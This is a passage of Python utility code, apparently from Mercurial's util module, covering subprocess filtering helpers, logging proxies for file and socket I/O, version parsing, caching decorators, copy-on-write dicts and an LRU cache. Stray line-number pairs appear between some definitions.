    pipes = popen4(cmd, env, newlines)
    return pipes[0], pipes[1], pipes[2]
484 484
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Spawn `cmd` through the shell.

    Returns (stdin, stdout, stderr, process-handle).
    """
    proc = subprocess.Popen(cmd,
                            shell=True,
                            bufsize=bufsize,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout, proc.stderr, proc
493 493
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    # __slots__ plus the object.__setattr__ calls in __init__ keep the
    # proxy itself down to these two fields; all other attribute traffic
    # is forwarded to the wrapped file object.
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        # object.__setattr__ bypasses our own __setattr__, which forwards
        # assignments to the wrapped object.
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        # Names resolved on the proxy itself; anything not listed here is
        # looked up directly on the wrapped file object.
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed if a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        # Truthiness mirrors the wrapped object's.
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    # Each wrapper below funnels one I/O method through _observedcall()
    # so the observer sees the call, its arguments, and its result.
    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        # assumes self._input is a fileobjectproxy, so its _observer can
        # be told about the low-level os.read() that just happened.
        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res
691 691
# Socket methods that socketproxy intercepts; everything else resolves
# directly on the wrapped socket.
PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        # object.__setattr__ bypasses our own __setattr__, which forwards
        # assignments to the wrapped socket.
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        # Fix: this previously forwarded to the misspelled name
        # 'recv_info', so any observed recv_into() raised AttributeError
        # on the wrapped socket.
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)
811 811
# Map every byte to a printable escape; backslash and the common line
# endings get short conventional escapes instead of \xNN.
DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
DATA_ESCAPE_MAP.update({
    b'\\': b'\\\\',
    b'\r': br'\r',
    b'\n': br'\n',
})
# Bytes that escapedata() rewrites: C0 controls (except tab \x09),
# backslash, DEL, and all high bytes. Printable ASCII passes through.
DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
819 819
def escapedata(s):
    """Return ``s`` with control, backslash and non-ASCII bytes escaped."""
    # The escape map is keyed on bytes, so normalize bytearray input first.
    if isinstance(s, bytearray):
        s = bytes(s)

    def _escape(match):
        return DATA_ESCAPE_MAP[match.group(0)]

    return DATA_ESCAPE_RE.sub(_escape, s)
825 825
class baseproxyobserver(object):
    """Shared payload-logging logic for the proxy observers below."""

    def _writedata(self, data):
        """Write ``data`` to the log according to the configured verbosity."""
        if not self.logdata:
            # Payload logging is off; just terminate any pending API line.
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        if b'\n' in data:
            # Data with newlines is written to multiple lines.
            if self.logdataapis:
                self.fh.write(':\n')

            for chunk in data.splitlines(True):
                self.fh.write('%s> %s\n' % (self.name, escapedata(chunk)))
            self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if self.logdataapis:
            self.fh.write(': %s\n' % escapedata(data))
        else:
            self.fh.write('%s> %s\n' % (self.name, escapedata(data)))
        self.fh.flush()
851 851
class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        # fh: stream log lines are written to.
        self.fh = fh
        # name: prefix identifying this file object in the log.
        self.name = name
        # logdata: also log payload bytes (via _writedata()).
        self.logdata = logdata
        # logdataapis: log one line per API call with sizes/results.
        self.logdataapis = logdataapis
        # reads/writes: toggles for read-side/write-side observation.
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        # res is the count of bytes actually read; None means no data.
        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)
935 935
def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""
    observer = fileobjectobserver(logh, name,
                                  reads=reads,
                                  writes=writes,
                                  logdata=logdata,
                                  logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)
943 943
class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        # fh: stream log lines are written to; name: log prefix.
        self.fh = fh
        self.name = name
        # reads/writes/states: toggles for the three observation groups.
        self.reads = reads
        self.writes = writes
        self.states = states
        # logdata: also log payload bytes; logdataapis: log API call lines.
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        self.fh.write('%s> send(%d, %d) -> %d' % (
            self.name, len(data), flags, len(res)))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        # Fix: observer callbacks are invoked as fn(res, *args) by
        # socketproxy._observedcall(), so ``res`` must be the first
        # parameter. It was missing here, and the format string below has
        # four %r conversions but was only handed three values, so every
        # observed setsockopt() raised TypeError.
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))
1060 1060
def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""
    observer = socketobserver(logh, name,
                              reads=reads,
                              writes=writes,
                              states=states,
                              logdata=logdata,
                              logdataapis=logdataapis)
    return socketproxy(fh, observer)
1069 1069
def version():
    """Return version information if available."""
    try:
        # The version module is generated at build time and may be absent.
        from . import __version__
    except ImportError:
        return 'unknown'
    return __version__.version
1077 1077
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Split off the "extra" part at the first '+' or '-'. The pattern is a
    # raw string: '\+' inside a non-raw literal is an invalid escape
    # sequence and warns on modern Python.
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # Stop at the first non-numeric component (e.g. 'rc').
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
1146 1146
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount

    if argcount == 0:
        # A zero-argument function has exactly one result; stash it in a
        # one-element list on first use.
        results = []
        def f():
            if not results:
                results.append(func())
            return results[0]
        return f

    cache = {}
    if argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f
1172 1172
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        shared = getattr(self, '_copied', 0)
        if not shared:
            # No outstanding cheap copies; writing in place is safe.
            return self
        self._copied = shared - 1
        return self.__class__(self)

    def copy(self):
        """always do a cheap copy"""
        # Just bump the share count; the real copy happens lazily in
        # preparewrite().
        self._copied = getattr(self, '_copied', 0) + 1
        return self
1190 1190
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # Re-setting an existing key moves it to the end (last-set order),
        # unlike a plain OrderedDict which keeps the original position.
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
1215 1215
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    ``copy()`` only bumps a share counter; the actual dict copy is
    deferred until a writer calls ``preparewrite()``.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
1241 1241
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
1247 1247
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            # Commit only when the body finished without an exception.
            if exc_type is None:
                self.close()
        finally:
            # release() always runs; per its contract it aborts when the
            # transaction was not closed.
            self.release()
1272 1272
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # InterventionRequired is an expected condition: commit what we
        # have before letting it propagate to the caller.
        tr.close()
        raise
    finally:
        # Any other exception skips close(), so release() aborts here.
        tr.release()
1290 1290
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing on enter or exit."""
    yield None
1294 1294
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    # NOTE: slot names are unicode literals, matching the file's convention.
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        # ``_notset`` (module-level sentinel) marks a node that currently
        # holds no entry; see markempty().
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
1313 1313
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        # max: cache capacity; nodes are allocated lazily up to this count.
        self._cache = {}

        # The ring starts as a single empty node linked to itself.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        # A lookup counts as an access: promote the node to newest.
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        # NOTE: unlike __getitem__, a hit here does not refresh recency
        # (no _movetohead call).
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        # Empty every node but keep the allocated ring for reuse.
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        """Return a new lrucachedict with the same entries and recency order."""
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
1472 1472
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()

    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg in cache:
                # Cache hit: refresh the key's recency.
                order.remove(arg)
            else:
                # Evict the least recently used entry once past capacity.
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args in cache:
                order.remove(args)
            else:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            order.append(args)
            return cache[args]

    return f
1499 1499
class propertycache(object):
    """Descriptor caching a computed attribute on first access.

    The value is stored in the instance ``__dict__``, which shadows the
    descriptor on subsequent lookups, so the function runs only once.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1512 1512
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    # EAFP: deleting a missing entry is not an error
    try:
        del obj.__dict__[prop]
    except KeyError:
        pass
1517 1517
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    # shell=True lets CMD be a full command line; only stdout is captured,
    # stderr stays attached to the caller's stderr
    p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    pout, perr = p.communicate(s)
    # perr is None (stderr was not piped); the exit status is ignored here
    return pout
1524 1524
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        # write the input to a temp file the command can read
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, r'wb')
        fp.write(s)
        fp.close()
        # reserve an output temp file; the command itself will write it
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            # OpenVMS reports success with the low status bit set
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # best-effort cleanup of both temp files; mkstemp may have failed
        # before assigning the names, hence the None guards
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
1558 1558
# map a filter-spec prefix to the function implementing that strategy;
# filter() below strips the prefix before delegating
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}
1563 1563
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    # dispatch on a known scheme prefix; fall back to a plain pipe
    for prefix, fn in filtertable.iteritems():
        if cmd.startswith(prefix):
            return fn(s, cmd[len(prefix):].lstrip())
    return pipefilter(s, cmd)
1570 1570
def binary(s):
    """return true if a string is binary data"""
    # heuristic: any NUL byte marks the data as binary; empty input is not
    return bool(s) and '\0' in s
1574 1574
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        # position of the highest set bit, i.e. floor(log2(x)); 0 for x == 0
        if not x:
            return 0
        bits = 0
        while x:
            x >>= 1
            bits += 1
        return bits - 1

    pending = []
    pendingsize = 0
    for chunk in source:
        pending.append(chunk)
        pendingsize += len(chunk)
        if pendingsize >= min:
            if min < max:
                # double the threshold, then snap it up to the largest
                # power of two not exceeding what we just buffered,
                # capped at max
                min = min << 1
                nmin = 1 << log2(pendingsize)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(pending)
            pendingsize = 0
            pending = []
    if pending:
        # final partial chunk, may be smaller than min
        yield ''.join(pending)
1605 1605
# convenience alias so users of this module need not import error directly
Abort = error.Abort
1607 1607
def always(fn):
    '''predicate that matches anything; ``fn`` is ignored'''
    return True
1610 1610
def never(fn):
    '''predicate that matches nothing; ``fn`` is ignored'''
    return False
1613 1613
def nogc(func):
    """decorator: call ``func`` with the cyclic garbage collector disabled

    CPython triggers a collection each time a certain number of container
    objects (see gc.get_threshold()) have been allocated, even for objects
    marked as untracked — tracking only affects what the GC looks into,
    not when it runs.  Disabling the collector while building complex
    (huge) containers works around that; the previous collector state is
    restored afterwards.  The issue was fixed in 2.7 but still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
